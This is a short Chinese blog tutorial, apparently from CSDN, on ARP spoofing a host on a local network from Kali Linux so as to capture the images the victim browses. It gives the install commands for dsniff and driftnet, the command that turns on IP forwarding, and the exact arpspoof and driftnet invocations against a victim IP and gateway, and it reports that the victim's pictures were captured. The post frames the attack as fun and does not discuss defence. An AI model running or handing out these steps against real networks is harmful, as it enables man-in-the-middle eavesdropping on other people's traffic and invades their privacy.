arp内网欺骗_获取受害人浏览的图片

感觉好玩就发出来让大家开心。。。技术含量不高,大牛就绕过吧

环境

ipmac
kali192.168.34.8000:0c:29:69:8e:09
受害主机192.168.34.6900-E0-4C-36-1E-D9

kali需要有两个工具:arpspoofdriftnet

没有arpspoof,执行以下代码安装,网上还安装了其他的,但我只安装了dsniff就可以使用arpspoof命令。

apt-get install dsniff

没有driftnet直接apt-get。

apt-get install driftnet

下面这行代码也要执行。为了开启ip转发功能。不转发的话,受害者机器就断网了。

echo 1 > /proc/sys/net/ipv4/ip_forward;

环境差不多了,开始攻击了

攻击

执行ifconfig命令查看本机网卡名称和ip地址

在这里插入图片描述

在kali中执行命令:arpspoof -t 目标ip 网关ip -i 网卡

arpspoof -t 192.168.34.69 192.168.34.254 -i eth0

在这里插入图片描述
受害者主机wireshark抓包就可以看见已经被欺骗,192.168.34.254的网关地址被欺骗为了kali的mac地址

在这里插入图片描述

再打开一个命令行执行:driftnet -i 网卡

driftnet -i eth0

在这里插入图片描述

此时受害者访问百度图片。

在这里插入图片描述
随意点击一张图片,kali成功抓取到受害者的图片。

在这里插入图片描述

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Vicl1fe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值